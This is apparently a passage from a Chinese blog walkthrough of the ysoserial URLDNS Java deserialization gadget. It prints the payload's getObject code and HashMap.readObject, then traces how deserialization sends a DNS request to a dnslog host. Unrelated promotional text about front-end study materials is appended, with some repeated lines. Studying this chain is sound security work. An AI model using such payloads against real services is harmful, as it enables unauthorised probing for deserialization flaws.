创建了HashMap对象:
URL u = new URL(null, “http://lyxhh.dnslog.cn”, handler);
URL对象:
ht.put(u, “http://lyxhh.dnslog.cn”);
将URL对象作为HashMap中的key,dnslog地址为值,存入HashMap中。
Reflections.setFieldValue(u, “hashCode”, -1);
通过反射机制 设置URL对象的成员变量hashCode值为-1,为什么要设置值为-1,这问题在反序列化时会详细说到。
将HashMap对象返回 return ht; ,接着对 HashMap对象 进行序列化操作 Serializer.serialize(object, out); 并将序列化的结果重定向到 dnslog.ser 文件中。
由于HashMap中重写了writeObject方法,因此在进行序列化操作时,执行的序列化方法是HashMap中的writeObject方法,具体如下:
先执行默认的序列化操作:
接着 遍历HashMap,对HashMap中的key,value进行序列化。
综上所述,梳理下ysoserial payload,URLDNS 序列化的整个过程:
-
首先 ysoserial 通过反射的方式,根据全限定类名
ysoserial.payloads.URLDNS,获取对应的Class类对象,并通过Class类对象的newInstance()方法,获取URLDNS对象。 -
接着执行URLDNS对象中的getObject方法。
-
在getObject方法中,创建了URLStreamHandler 对象
URLStreamHandler handler = new SilentURLStreamHandler();,该对象会被URL对象引用。 -
创建HashMap对象
HashMap ht = new HashMap();,URL对象URL u = new URL(null, "http://lyxhh.dnslog.cn", handler);。 -
将URL对象作为HashMap中的Key,DNSLOG的地址作为HashMap中的值
HashMap.put(u, "http://lyxhh.dnslog.cn"); -
通过反射的方式
Reflections.setFieldValue(u, "hashCode", -1);,设置URL对象中的成员变量hashCode值为-1。 -
返回HashMap对象。
-
然后对HashMap对象进行序列化操作
Serializer.serialize(HashMap object, out);
整个序列化过程中,有几个问题: 1、为什么要创建URLStreamHandler 对象,URL对象中默认的URLStreamHandler 对象不香吗。 2、为什么要设置URL对象中的成员变量hashCode值为-1。
反序列化分析
读取上述操作生成的 dnslog.ser 文件,执行反序列化,触发DNSLOG请求:
为什么HashMap的反序列化过程会发送DNSLOG请求呢?
在进行反序列化操作时,由于HashMap中重写了readObject方法,因此执行的反序列化方法是HashMap中的readObject方法,如下:
private void readObject(java.io.ObjectInputStream s)
throws IOException, ClassNotFoundException {
// Read in the threshold (ignored), loadfactor, and any hidden stuff
s.defaultReadObject(); // 执行默认的反序列化方法
reinitialize(); //初始化变量值
if (loadFactor <= 0 || Float.isNaN(loadFactor))
throw new InvalidObjectException("Illegal load factor: " +
loadFactor);
s.readInt(); // Read and ignore number of buckets
int mappings = s.readInt(); // Read number of mappings (size)
if (mappings < 0)
throw new InvalidObjectException("Illegal mappings count: " +
mappings);
else if (mappings > 0) { // (if zero, use defaults)
// Size the table using given load factor only if within
// range of 0.25...4.0
float lf = Math.min(Math.max(0.25f, loadFactor), 4.0f);
float fc = (float)mappings / lf + 1.0f;
int cap = ((fc < DEFAULT_INITIAL_CAPACITY) ?
DEFAULT_INITIAL_CAPACITY :
(fc >= MAXIMUM_CAPACITY) ?
MAXIMUM_CAPACITY :
tableSizeFor((int)fc));
float ft = (float)cap * lf;
threshold = ((cap < MAXIMUM_CAPACITY && ft < MAXIMUM_CAPACITY) ?
(int)ft : Integer.MAX_VALUE);
@SuppressWarnings({"rawtypes","unchecked"})
Node<K,V>[] tab = (Node<K,V>[])new Node[cap];
table = tab;
// Read the keys and values, and put the mappings in the HashMap
for (int i = 0; i < mappings; i++) {
@SuppressWarnings("unchecked")
K key = (K) s.readObject(); // 遍历hashmap,进行反序列化操作,还原key值,这里的key值,是URL对象。
@SuppressWarnings("unchecked")
V value = (V) s.readObject(); // 还原value值,这里的value值,是dnslog的请求地址,http://lyxhh.dnslog.cn
putVal(hash(key), key, value, false, false); //对key进行hash计算,确保唯一,并构造Hashmap对象。
}
}
}
readObject中,先执行默认的反序列化方法,接着还原HashMap,并计算Key,如下:
这里我们跟进hash(key)方法中。
接着执行了 key.hashCode() ,而key是URL对象,因此执行的是URL对象中的hashCode方法,继续跟进。
在序列化操作时,已经通过反射设置了URL的hashCode等于-1,因此这里会直接进入到 handler.hashCode(this); 中。
hashCode方法中会执行 getHostAddress(URL u) 方法,方法中调用了 InetAddress.getByName(host); 函数,从而发送DNSLOG请求。
使用 InetAddress.getByName(host); ,发送DNSLOG请求。
综上所述,梳理下ysoserial payload,URLDNS 反序列化的整个过程:
-
首先 HashMap 重写了readObject方法,因此在反序列化过程中,执行的反序列化方法是HashMap中的readObject方法。
-
在HashMap中的readObject方法中,会对Key进行hash计算
key.hashCode(),而Key是URL对象,执行URL对象的hashCode方法。 -
在URL.hashCode方法中,当hashCode成员变量值为-1时,会执行URLStreamHandler.hashCode()方法。
-
在URLStreamHandler.hashCode()方法中,会执行
getHostAddress(URL u)方法。 -
在
getHostAddress(URL u)方法中,会执行InetAddress.getByName(host);,从而发送DNSLOG请求。
解决序列化时遗留的问题
1、为什么要创建URLStreamHandler 对象,URL对象中默认的URLStreamHandler 对象不香吗。
URLDNS中getObject方法中。
public Object getObject(final String url) throws Exception {
URLStreamHandler handler = new SilentURLStreamHandler();
HashMap ht = new HashMap();
URL u = new URL(null, url, handler);
ht.put(u, url);
Reflections.setFieldValue(u, "hashCode", -1);
return ht;
}
URLStreamHandler handler = new SilentURLStreamHandler();
小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数初中级前端工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年Web前端开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频
如果你觉得这些内容对你有帮助,可以添加下面V无偿领取!(备注:前端)
最后
推荐一些系统学习的途径和方法。
每个Web开发人员必备,很权威很齐全的Web开发文档。作为学习辞典使用,可以查询到每个概念、方法、属性的详细解释,注意使用英文关键字搜索。里面的一些 HTML,CSS,HTTP 技术教程也相当不错。
开源分享:【大厂前端面试题解析+核心总结学习笔记+真实项目实战+最新讲解视频】
HTML 和 CSS:
权威很齐全的Web开发文档。作为学习辞典使用,可以查询到每个概念、方法、属性的详细解释,注意使用英文关键字搜索。里面的一些 HTML,CSS,HTTP 技术教程也相当不错。
开源分享:【大厂前端面试题解析+核心总结学习笔记+真实项目实战+最新讲解视频】
HTML 和 CSS:
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
